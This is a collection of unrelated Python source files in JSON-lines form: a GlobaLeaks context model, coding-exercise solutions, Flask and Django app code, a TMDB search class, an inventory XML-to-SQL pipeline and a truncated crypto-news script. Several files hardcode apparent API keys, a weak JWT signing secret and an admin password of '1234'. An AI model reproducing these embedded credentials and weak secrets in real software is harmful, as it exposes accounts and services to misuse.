unicode(context_gus)).one()\n        log.debug(\"[L] before language update, context\", context_gus, \"was\", requested_c.languages_supported, \"and after got\", language_list)\n\n        requested_c.languages_supported = language_list\n        requested_c.update_date = gltime.utcDateNow()\n\n        store.commit()\n        store.close()\n\n
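update_languages above recomputes a context's supported languages by scanning every receiver and appending unseen entries; the same aggregation collapses to a set union. A self-contained sketch on plain dicts, with hypothetical data:

```python
receivers = [
    {"know_languages": ["en", "it"]},
    {"know_languages": ["it", "fr"]},
]

# Union of every receiver's languages; sorting gives a stable order.
language_list = sorted({lang for r in receivers for lang in r["know_languages"]})
print(language_list)  # ['en', 'fr', 'it']
```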
    # this is called internally by @transact functions\n    def get_receivers(self, info_type, context_gus=None):\n        \"\"\"\n        @param context_gus: target context to be searched between receivers, if not specified,\n            the receivers returned are searched in 'self'\n        @info_type: it is a string with three possible values:\n            'public': get the information represented to the WB and in public\n            'internal': a series of data used by internal calls\n            'admin': complete dump of the information, wrap Receiver._description_dict\n        @return: a list, 0 to MANY receiverDict tuned for the caller requirements\n        \"\"\"\n        from globaleaks.models.receiver import Receiver\n\n        typology = [ 'public', 'internal', 'admin' ]\n\n        if not info_type in typology:\n            log.debug(\"[Fatal]\", info_type, \"not found in\", typology)\n            raise NotImplementedError\n\n        store = self.getStore('context get_receivers')\n\n        # I've made some experiments with https://storm.canonical.com/Manual#IN (in vain)\n        # the goal is to search which context_gus is present in the Receiver.contexts\n        # and then work in the selected Receiver.\n\n\n        if context_gus:\n            workinobj = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        else:\n            workinobj = self\n\n        # Hi. I'm a really DIRTY HACK.\n        # :)\n        # Hi. I'm a really DIRTY HACK.\n        # :)\n\n        receiver_list = workinobj.receivers\n        #store.close()\n        #return receiver_list\n\n        all_r = store.find(Receiver)\n        for r in all_r:\n\n            partial_info = {}\n\n            if info_type == typology[0]: # public\n                partial_info.update({'receiver_gus' : r.receiver_gus })\n                partial_info.update({'name': r.name })\n                partial_info.update({'description': r.description })\n            if info_type == typology[1]: # internal\n                partial_info.update({'receiver_gus' : r.receiver_gus })\n                partial_info.update({'know_languages' : r.know_languages })\n            if info_type == typology[2]: # admin\n                partial_info = r._description_dict()\n\n            receiver_list.append(partial_info)\n\n        # GoodBye. I'm a really DIRTY HACK.\n        # :)\n        # GoodBye. I'm a really DIRTY HACK.\n        # :)\n\n        store.close()\n        return receiver_list\n\n\n    @transact\n    def full_context_align(self, receiver_gus, un_context_selected):\n        \"\"\"\n        Called by Receiver handlers (PUT|POST); iterates over all the contexts and deletes|adds|skips\n        based on the presence of receiver_gus\n        \"\"\"\n        store = self.getStore('full_context_align')\n\n        context_selected = []\n        for c in un_context_selected:\n            context_selected.append(str(c))\n\n        presents_context = store.find(Context)\n\n        debug_counter = 0\n        for c in presents_context:\n\n            # if it is not present in context.receivers and is requested: add\n            if c.receivers and not receiver_gus in c.receivers:\n                if c.context_gus in context_selected:\n                    debug_counter += 1\n                    c.receivers.append(str(receiver_gus))\n\n            # if it is present in receiver.contexts and is not selected: remove\n            if c.receivers and (receiver_gus in c.receivers):\n                if not c.context_gus in context_selected:\n                    debug_counter += 1\n                    c.receivers.remove(str(receiver_gus))\n\n        log.debug(\" %%%% full_context_align in all contexts after %s has been set with %s: %d mods\" %\n                  ( receiver_gus, str(context_selected), debug_counter ) )\n\n        store.commit()\n        store.close()\n\n\n    @transact\n    def context_align(self, context_gus, receiver_selected):\n        \"\"\"\n        Called by the Context handler (PUT|POST); takes the context and updates the\n        associated receivers\n        \"\"\"\n        store = self.getStore('context_align')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        except NotOneError:\n            store.close()\n            raise ContextGusNotFound\n        if requested_c is None:\n            store.close()\n            raise ContextGusNotFound\n\n        requested_c.receivers = []\n        for r in receiver_selected:\n            requested_c.receivers.append(str(r))\n\n        log.debug(\" ++++ context_align in receiver %s with receivers %s\" %\n                  ( context_gus, str(receiver_selected) ) )\n\n        store.commit()\n        store.close()\n\n
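full_context_align and context_align above reconcile the receiver lists by appending or removing one entry at a time; with sets, membership reconciliation for a single context reduces to add-or-discard. A self-contained sketch, not the project's code:

```python
def reconcile(current_receivers, receiver_gus, selected):
    # Make membership of receiver_gus match the selection, idempotently.
    members = set(current_receivers)
    if selected:
        members.add(receiver_gus)
    else:
        members.discard(receiver_gus)
    return sorted(members)

print(reconcile(["r1"], "r2", True))         # ['r1', 'r2']
print(reconcile(["r1", "r2"], "r2", False))  # ['r1']
```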
    # This is not a transact method; it is used internally by this class to assemble\n    # the response dict. It returns all the information of a context; the caller,\n    # using .pop(), should remove any 'confidential' values\n    def _description_dict(self):\n\n        description_dict = {\n            \"context_gus\": self.context_gus,\n            \"name\": self.name,\n            \"description\": self.description,\n            \"selectable_receiver\": self.selectable_receiver,\n            \"languages\": self.languages_supported if self.languages_supported else [],\n            'tip_max_access' : self.tip_max_access,\n            'tip_timetolive' : self.tip_timetolive,\n            'file_max_download' : self.file_max_download,\n            'escalation_threshold' : self.escalation_threshold,\n            'fields': self.fields,\n            'receivers' : self.receivers if self.receivers else []\n\n        }\n        # receivers is added\n\n        return description_dict\n\n    # this method imports the remotely received dict.\n    # it could be expanded with default values (if configured) and with checks on the\n    # expected fields. it is called by new() and update()\n\n    def _import_dict(self, context_dict):\n\n        self.name = context_dict['name']\n        self.fields = context_dict['fields']\n        self.description = context_dict['description']\n        self.selectable_receiver = context_dict['selectable_receiver']\n        self.escalation_threshold = context_dict['escalation_threshold']\n        self.tip_max_access = context_dict['tip_max_access']\n        self.tip_timetolive = context_dict['tip_timetolive']\n        self.file_max_download = context_dict['file_max_download']\n\n        if self.selectable_receiver and self.escalation_threshold:\n            log.msg(\"[!] Selectable receiver feature and escalation threshold can't both be active: threshold ignored\")\n            self.escalation_threshold = 0\n\n","repo_name":"Afridocs/GLBackend","sub_path":"globaleaks/models/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162858654","text":"from typing import List\n\n\nclass Solution:\n    def gardenNoAdj(self, n: int, paths: List[List[int]]) -> List[int]:\n        \"\"\"\n        The approach is clear: build the graph first, then color it, but the coloring step here is wrong.\n        The problem: assigning colors to target vertices during traversal is unreliable; for example,\n        it cannot correctly handle the case where the target vertex should keep color 1.\n        For coloring problems like this, one should start from the node's own color and iterate\n        step by step; see the advanced function for details.\n        :param n:\n        :param paths:\n        :return:\n        \"\"\"\n        ans = [1] * n\n        map = [[] for _ in range(n)]\n        for u, v in paths:\n            map[u - 1].append(v - 1)\n            map[v - 1].append(u - 1)\n        for i in range(n):\n            for j in range(len(map[i])):\n                if map[i][j] > i:\n                    ans[map[i][j]] = max(ans[map[i][j]], ans[i] + 1)\n\n        return ans\n\n    def advanced(self, n: int, paths: List[List[int]]) -> List[int]:\n        g = [[] for _ in range(n)]\n        for u, v in paths:\n            g[u - 1].append(v - 1)\n            g[v - 1].append(u - 1)\n        color = [0] * n\n        for i, nodes in enumerate(g):\n            color[i] = (set(range(1, 5)) - {color[j] for j in nodes}).pop()\n        return color\n\n    def Bitwise(self, n: int, paths: List[List[int]]) -> List[int]:\n        g = [[] for _ in range(n)]\n        for u, v in paths:\n            g[u - 1].append(v - 1)\n            g[v - 1].append(u - 1)\n        color = [0] * n\n        for i, nodes in enumerate(g):\n            mask = 1\n            for j in g[i]:\n                mask |= 1 << color[j]\n            mask = ~mask\n            color[i] = (mask & -mask).bit_length() - 1\n        return color\n\n\nif __name__ == '__main__':\n    z, c = 4, [[1, 2], [3, 4]]\n    print(1 << 0)\n    so = Solution()\n    print(so.Bitwise(z, c))\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1042.py","file_name":"1042.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31297519172","text":"# rename to config.py\nfrom dataclasses import dataclass\n\n@dataclass\nclass Plan:\n    name: str\n    price: float\n    
popular: bool\n features: list[str]\n legendText: str\n\n@dataclass\nclass Page:\n route: str\n name: str\n\nclass AppPage(Page):\n accessibleBy: list[str]\n icon: str\n\n def __init__(self, route:str, name:str, accessibleBy:list[str]=['user', 'patient', 'medicalPersonnel', 'doctor', 'medicalAssistant', 'administrative'], icon:str=None):\n super().__init__(route, name)\n self.accessibleBy = accessibleBy\n if icon is not None:\n self.icon = icon\n else:\n self.icon = 'icons/home.svg'\n \nclass Config(object):\n DEBUG = False\n TESTING = False\n ENV = 'production'\n JSON_SORT_KEYS = False\n SESSION_COOKIE_SAMESITE = 'Strict'\n SECRET_KEY = 'meedikal' # used to sign and verify jwt tokens\n DATABASE = 'meedikal.db'\n UPLOAD_FOLDER = 'images/'\n Admin = {\n 'id': 12345678,\n 'name1': 'john',\n 'surname1': 'doe',\n 'sex': 'M',\n 'birthdate': '2002-10-24',\n 'location': 'Street 123',\n 'email': 'mateocarriqui7@gmail.com',\n 'password': '1234',\n 'active': 1,\n }\n \n company_name = 'Healthcare Company'\n \n central_data = {\n 'address': 'Jorge Canning 2363, Montevideo',\n 'email': 'support@hccompany.com',\n 'phone': '123-456-7890',\n 'google_maps_link': 'https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d13095.168728844454!2d-56.1938193!3d-34.8614488!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xa3c298c9fd703d35!2sSociedad%20M%C3%A9dica%20Universal!5e0!3m2!1sen!2suy!4v1633202238613!5m2!1sen!2suy'\n }\n\n role_colors = {\n 'user': 'bg-gray-300',\n 'administrative': 'bg-red-500',\n 'patient': 'bg-turqoise',\n 'medicalPersonnel': 'bg-skyblue',\n 'doctor': 'bg-darker-skyblue',\n 'medicalAssistant': 'bg-skyblue',\n }\n\n plans = [\n Plan(name='Plan 1',\n price=100,\n popular=False, \n features=['feature 1',\n 'feature 2',\n 'feature 3'],\n legendText='Initial Plan.'),\n \n Plan(name='Plan 2',\n price=190, \n popular=True,\n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5'],\n legendText='Pro Plan.'),\n \n Plan(name='Plan 3', \n price=400, \n popular=False,\n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5',\n 'feature 6'],\n legendText='Family Plan.'),\n \n Plan(name='Plan 4', \n price=750, \n popular=False, \n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5',\n 'feature 6',\n 'feature 7'],\n legendText='Golden Plan.'),\n ]\n\n landing_pages = [\n Page(route='/', name='Home'), \n Page(route='/contact', name='Contact'), \n Page(route='/plans', name='Plans'),\n Page(route='/login', name='Login'),\n Page(route='/affiliate', name='Affiliate')\n ]\n\n app_pages = [\n AppPage('/app', 'Home', icon='icons/home.svg'),\n AppPage('/app/users', 'Users', ['administrative'], icon='icons/users.svg'),\n AppPage('/app/appointments', 'Appointments', icon='icons/appointments.svg'),\n AppPage('/app/patients', 'Patients', ['doctor'], icon='icons/users.svg'),\n AppPage('/app/symptoms', 'Symptoms', icon='icons/symptoms.svg'),\n AppPage('/app/diseases', 'Diseases', icon='icons/diseases.svg'),\n AppPage('/app/clinical-signs', 'Clinical Signs', icon='icons/clinical_signs.svg'),\n AppPage('/app/branches', 'Branches', icon='icons/branches.svg'),\n AppPage('/app/stats', 'Stats', ['administrative'], icon='icons/stats.svg'),\n AppPage('/app/profile', 'Profile'),\n ]\n\nclass ProductionConfig(Config):\n DEBUG = False\n\nclass StagingConfig(Config):\n DEBUG = True\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n ENV= \"development\"\n\nclass TestingConfig(Config):\n TESTING = 
True\n","repo_name":"system32uwu/Meedikal","sub_path":"app/config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15949955507","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('account', '0003_auto_20160311_1442'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='student',\n name='number_of_semesters',\n field=models.PositiveIntegerField(null=True, blank=True),\n ),\n ]\n","repo_name":"aakash-cr7/demo-ucp","sub_path":"account/migrations/0004_auto_20160311_1510.py","file_name":"0004_auto_20160311_1510.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158166887","text":"n, m = map(int, input().split())\r\narr = []\r\ndef recur(start):\r\n if len(arr) == m:\r\n print(*arr)\r\n return\r\n for i in range(start, n+1):\r\n arr.append(i)\r\n recur(i)\r\n arr.pop()\r\n\r\nrecur(1)","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"백준/Silver/15652. N과 M (4)/N과 M (4).py","file_name":"N과 M (4).py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24816399910","text":"from logging import FileHandler, WARNING\r\nimport json\r\nimport csv\r\nfrom flask import Flask, render_template, request\r\n\r\napp = Flask(__name__, template_folder='./template')\r\nfile_handler = FileHandler('errorlog.txt')\r\nfile_handler.setLevel(WARNING)\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/submit_form', methods=['POST', 'GET'])\r\ndef submit_form():\r\n if request.method == \"POST\":\r\n try:\r\n data = request.form.to_dict()\r\n write_to_csv(data)\r\n return 'thanks fam'\r\n except:\r\n return 'did not save to database'\r\n else:\r\n return 'oh no something went wrong'\r\n\r\n\r\ndef write_to_csv(data):\r\n with open('database.csv', mode='a', newline='') as database:\r\n email = data[\"email\"]\r\n subject = data[\"subject\"]\r\n message = data[\"message\"]\r\n csv_writer = csv.writer(database, delimiter=\",\", quotechar=\"'\", lineterminator='\\n', quoting=csv.QUOTE_MINIMAL)\r\n csv_writer.writerow([email, subject, message])\r\n","repo_name":"bananarchy3/portfolio","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35066626117","text":"\n# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n'''\nGiven a Binary Tree of size N , You have to count leaves in it. 
For example, there are two leaves in following tree\n'''\n\nclass Node: \n def __init__(self, value):\n self.value = value\n self.right = None\n self.left = None\n\nclass Solution:\n def countLeaves(self, root, leaf):\n if not root:\n return leaf\n if not root.left and not root.right:\n leaf += 1\n return leaf\n leaf = self.countLeaves(root.left, leaf)\n leaf = self.countLeaves(root.right, leaf)\n return leaf\n\nif __name__=='__main__':\n sol = Solution()\n root = Node(1) \n root.left = Node(2) \n root.right = Node(3) \n root.right.left = Node(4)\n root.right.right = Node(5)\n print(sol.countLeaves(root, 0))","repo_name":"dixitomkar1809/Coding-Python","sub_path":"GFG/Tree/countLeavesInBinaryTree.py","file_name":"countLeavesInBinaryTree.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39297654488","text":"import tmdbsimple as tmdb\ntmdb.API_KEY = '5afe37acf61f67aad9c4a0d5817fa41b'\n\nclass SearchForActors():\n def __init__(self,keyword):\n self.l = []\n self.m = []\n self.keyword = keyword\n search = tmdb.Search()\n response = search.person(query=self.keyword)\n for i in response['results']:\n search1 = tmdb.People(i['id']).info()\n self.l.append([search1['id'],search1['name'],search1['biography'],search1['place_of_birth'],search1['birthday'],search1['popularity'],search1['profile_path']])\n","repo_name":"bpyardeep/Python-Flask","sub_path":"project/actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8110141506","text":"import requests\nimport pandas as pd\nimport numpy as np\nimport xml.etree.ElementTree as ET\nimport xmltodict\nimport pyodbc\nimport pymssql\nimport sqlalchemy \nfrom sqlalchemy import create_engine,inspect\nimport urllib\nimport json\nimport warnings\nwarnings.filterwarnings('ignore')\n\nserver = 'server\\server'\nusername = 'username'\npassword = 'password'\ndriver = 'ODBC Driver 17 for SQL Server'\ndatabase = 'stage'\nconn_str = (\nr'DRIVER={ODBC Driver 17 for SQL Server};'\nr'SERVER=server\\server;'\nr'DATABASE=db;'\nr'Trusted_Connection=yes;' )\n\nengine = create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % conn_str, fast_executemany=True)\nconn = engine.connect()\n\nclass StorageSolutionsData:\n def __init__(self):\n pass\n def get_token(self):\n data = {\n 'f': 'login',\n 'username': 'user',\n 'password': 'pw'\n }\n\n url = 'localhost'\n url = requests.get(url,params=data)\n xml_parse = xmltodict.parse(url.text)\n self.api_token = xml_parse['resp']['out']['token']\n print('API Token Received!')\n\n def get_board_list(self):\n # localhost#FuncPosboard_getlist\n data = {\n 'f': 'board_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['boardlist']['boardinfo']\n self.df = pd.DataFrame(xml_response)\n self.df_for_items = self.df\n self.df.reset_index(drop=True, inplace=True)\n self.df = self.df[['id','code','revision','description','notes','customercode','bintable','active']]\n self.df.to_sql('BoardInfo', engine, if_exists='replace',schema='juki')\n print('BoardInfo Pushed!')\n\n def regular_board(self):\n try:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'])\n df_board_item_filter = df_board_item['filter'].apply(pd.Series)\n df_board_item_consignment = 
df_board_item['consignment'].apply(pd.Series)\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item, df_board_item_filter,df_board_item_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n\n # https://stackoverflow.com/questions/65263207/valueerror-repeats-may-not-contain-negative-values\n df_concat = df_concat.ffill()\n\n # handling 2 supplier columns\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','consignment'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','supplier_2':'ConsignmentSupplier','priority':'ConsignmentPriority'},inplace=True)\n self.board_items.append(df_concat)\n except:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'].items())\n df_board_item = df_board_item.transpose()\n df_board_item.rename(columns=df_board_item.iloc[0],inplace=True)\n df_board_item = df_board_item.drop(df_board_item.index[0])\n df_board_item_filter = df_board_item['filter'].apply(pd.Series)\n df_board_item_consignment = df_board_item['consignment'].apply(pd.Series)\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item, df_board_item_filter,df_board_item_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n \n\n # https://stackoverflow.com/questions/65263207/valueerror-repeats-may-not-contain-negative-values\n df_concat = df_concat.ffill()\n\n # handling 2 supplier columns\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','consignment'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','supplier_2':'ConsignmentSupplier','priority':'ConsignmentPriority'},inplace=True)\n df_concat = df_concat.iloc[1: , :]\n self.board_items.append(df_concat)\n\n def alternative_board(self):\n df_board_item_alternative = pd.DataFrame(self.series['items']['boarditem']['alternativeitems']['alternativeitem'])\n df_board_item_alternative_filter = df_board_item_alternative['filter'].apply(pd.Series)\n df_board_item_alternative_consignment = pd.DataFrame(self.series['items']['boarditem']['consignment'],index=[0])\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item_alternative,df_board_item_alternative_filter,df_board_item_alternative_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n\n df_concat = df_concat.ffill()\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','priority','supplier_2'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','id':'itemid','code':'itemcode'},inplace=True)\n df_concat['OrderPref'] = np.arange(df_concat.shape[0])\n df_concat = df_concat[['board_id','itemid','itemcode','OrderPref','supplier','mpn','manufacturer']]\n self.alternative_board_items.append(df_concat)\n\n def 
get_board_items(self):\n self.board_items = []\n self.alternative_board_items = []\n faulty_format = []\n for i,self.series in self.df_for_items.iterrows():\n try:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'])\n if(len(df_board_item.alternativeitems.value_counts()) > 0) == False:\n self.regular_board()\n else:\n self.alternative_board()\n except Exception as e:\n faulty_format.append(self.series['id'])\n\n final_board = pd.concat(self.board_items)\n final_board.reset_index(drop=True, inplace=True)\n final_board.to_sql('BoardItem', engine, if_exists='replace',schema='juki')\n print('BoardItem Pushed!')\n\n final_board_alternative = pd.concat(self.alternative_board_items)\n final_board_alternative.reset_index(drop=True, inplace=True)\n final_board_alternative.to_sql('BoardAlternativeItems', engine, if_exists='replace',schema='juki')\n print('BoardAlternativeItmes Pushed!')\n\n def get_item_info(self):\n # localhost#FuncPositem_getlist\n data = {\n 'f': 'item_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['itemlist']['iteminfo']\n df = pd.DataFrame(xml_response)\n df.reset_index(drop=True, inplace=True)\n df.to_sql('ItemInfo', engine, if_exists='replace',schema='juki')\n print('ItemInfo Pushed!')\n\n def get_reel_info(self):\n # localhost#FuncPosreel_getlist\n data = {\n 'f': 'reel_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['reellist']['reelinfo']\n df = pd.DataFrame(xml_response)\n df[['adddate', 'adduser']] = df['add'].str.split(',', 1, expand=True)\n df.drop('add',inplace=True,axis=1)\n df.reset_index(drop=True, inplace=True)\n df.to_sql('ReelInfo', engine, if_exists='replace',schema='juki')\n print('ReelInfo Pushed!')\n\n def get_session_list(self):\n # localhost#FuncPossession_getlist\n\n data = {\n 'f': 'session_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['sessions']['sessioninfo']\n self.session_list_df = pd.DataFrame(xml_response)\n\n def get_session_boards(self):\n # localhost#FuncPossession_getboards\n\n session_boards = []\n no_session_boards = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getboards',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try: \n xml_response = xml_parse['resp']['out']['sessionboards']['sessionboard']\n df_session_board = pd.DataFrame(xml_response,index=[0])\n df_session_board['session_id'] = i\n df_session_board = df_session_board.ffill()\n first_column = df_session_board.pop('session_id')\n df_session_board.insert(0, 'session_id', first_column)\n session_boards.append(df_session_board)\n except:\n no_session_boards.append(i)\n final_session_boards = pd.concat(session_boards)\n final_session_boards.reset_index(drop=True, inplace=True)\n final_session_boards.to_sql('SessionBoard', engine, if_exists='replace',schema='juki')\n print('SessionBoard Pushed!')\n\n def get_session_info(self):\n # localhost#FuncPossession_getinfo\n \n session_info = []\n no_session_info = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 
'session_getinfo',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['info']\n df_session_info = pd.DataFrame(xml_response,index=[0])\n df_session_info = df_session_info.ffill()\n session_info.append(df_session_info)\n except:\n no_session_info.append(i)\n final_session_info = pd.concat(session_info)\n final_session_info.reset_index(drop=True, inplace=True)\n final_session_info.to_sql('SessionInfo', engine, if_exists='replace',schema='juki')\n print('SessionInfo Pushed!')\n\n def get_session_items(self):\n # localhost#FuncPossession_getitems\n session_items = []\n no_session_items = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getitems',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['sessionitems']['sessionitem']\n df_initial = pd.DataFrame(xml_response)\n df_item_info = df_initial['iteminfo'].apply(pd.Series)\n df_session_item = pd.concat([df_initial, df_item_info], axis=1, join='inner')\n df_session_item = df_session_item.drop('iteminfo', axis=1)\n \n df_session_item['session_id'] = i\n df_session_item = df_session_item.ffill()\n first_column = df_session_item.pop('session_id')\n df_session_item.insert(0, 'session_id', first_column)\n session_items.append(df_session_item)\n except:\n no_session_items.append(i)\n final_session_items = pd.concat(session_items)\n final_session_items.rename(columns={'id':'ItemId'},inplace=True)\n final_session_items.reset_index(drop=True, inplace=True)\n final_session_items.to_sql('SessionItem', engine, if_exists='replace',schema='juki')\n print('SessionItem Pushed!')\n\n def get_session_reels(self):\n # localhost#FuncPossession_getreels\n \n session_reels = []\n no_sessions = []\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getreels',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['sessionreels']['sessionreel']\n df = pd.DataFrame(xml_response)\n df['session_id'] = i\n df = df.ffill()\n first_column = df.pop('session_id')\n df.insert(0, 'session_id', first_column)\n session_reels.append(df)\n except:\n no_sessions.append(i) \n final_session_reels = pd.concat(session_reels)\n final_session_reels.reset_index(drop=True, inplace=True)\n final_session_reels.to_sql('SessionReel', engine, if_exists='replace',schema='juki')\n print('SessionReel Pushed!')\n conn.close()\n\ns = StorageSolutionsData()\ns.get_token()\ns.get_board_list()\ns.get_board_items()\ns.get_item_info()\ns.get_reel_info()\ns.get_session_list()\ns.get_session_boards()\ns.get_session_info()\ns.get_session_items()\ns.get_session_reels()\n","repo_name":"klapp101/StorageSolutions","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22619086857","text":"# importing the requests library\nimport requests\n\nimport http.client as httplib\nimport urllib\nimport json\n\n# for crypto data\nfrom datetime import datetime\nfrom time import mktime\n\nfrom newsapi import NewsApiClient\n\n# Get Request\n# def crypto_news(mode, coin, date, apiKey = 
\"00f61addc87f43299865eca28c4990fa\"):\n# # api-endpoint\n# URL = \"https://newsapi.org/v2/\" + mode\n# #sources for crypto newsapi\n#\n# # defining a params dict for the parameters to be sent to the API\n# PARAMS = {'q':coin, 'from': date, 'sortBy':'popularity','apiKey': apiKey}\n# # sending get request and saving the response as response object\n# r = requests.get(url = URL, params = PARAMS)\n#\n# # extracting data in json format\n# data = r.json()['articles']\n#\n# return data\n\ndef crypto_news(coin, start, final):\n\n newsapi = NewsApiClient(api_key=\"00f61addc87f43299865eca28c4990fa\")\n\n all_articles = newsapi.get_everything(q=coin,\n from_parameter=start,\n to=final,\n language='en',\n sort_by='relevancy')\n data = all_articles['articles']\n\n description_list = []\n\n for i in data:\n description_list.append(i[\"description\"])\n\n return data, description_list\n\ndef bing_news(search_term):\n\n subscription_key = '876a5eaf8f574cf1856c201c18f20997'\n search_url = 'https://api.cognitive.microsoft.com/bing/v7.0/news/search'\n\n headers = {\"Ocp-Apim-Subscription-Key\" : subscription_key}\n\n params = {\"q\": search_term, \"textDecorations\": True, \"textFormat\": \"HTML\", \"sortBy\": \"Date\", \"since\": 946684800}\n response = requests.get(search_url, headers=headers, params=params)\n response.raise_for_status()\n search_results = response.json()\n\n # All the value\n value = search_results[\"value\"]\n\n # descriptions = [article[\"description\"] for article in search_results[\"value\"]]\n\n return value\n\n# Post individual sentiment from azure\ndef GetSentiment(text):\n\n \"Gets the sentiments for a set of documents and returns the information.\"\n\n accessKey =\"c1029950d5e14c72808339af683178ef\"\n\n uri = 'eastus.api.cognitive.microsoft.com'\n\n path = '/text/analytics/v2.0/sentiment'\n\n headers = {'Ocp-Apim-Subscription-Key': accessKey}\n conn = httplib.HTTPSConnection(uri)\n\n documents = { 'documents': [\n { 'id': '1', 'language': 'en', 'text': text},\n ]}\n\n body = json.dumps(documents)\n conn.request(\"POST\", path, body, headers)\n response = conn.getresponse()\n\n result = response.read().decode('utf-8')\n\n json_result = json.loads(result)\n print(json_result)\n\n try:\n score = json_result['documents'][0][\"score\"]\n except Exception:\n score = 0\n\n return score\n\n# function to create list of strings\n# strings of description\ndef description(data):\n\n data_list = []\n for i in range(len(data)):\n data_list.append(data[i][\"description\"])\n\n return data_list\n\n# Crypto historical data\ndef crypto_data(coin, start, end, period):\n # api-endpoint\n # URL = 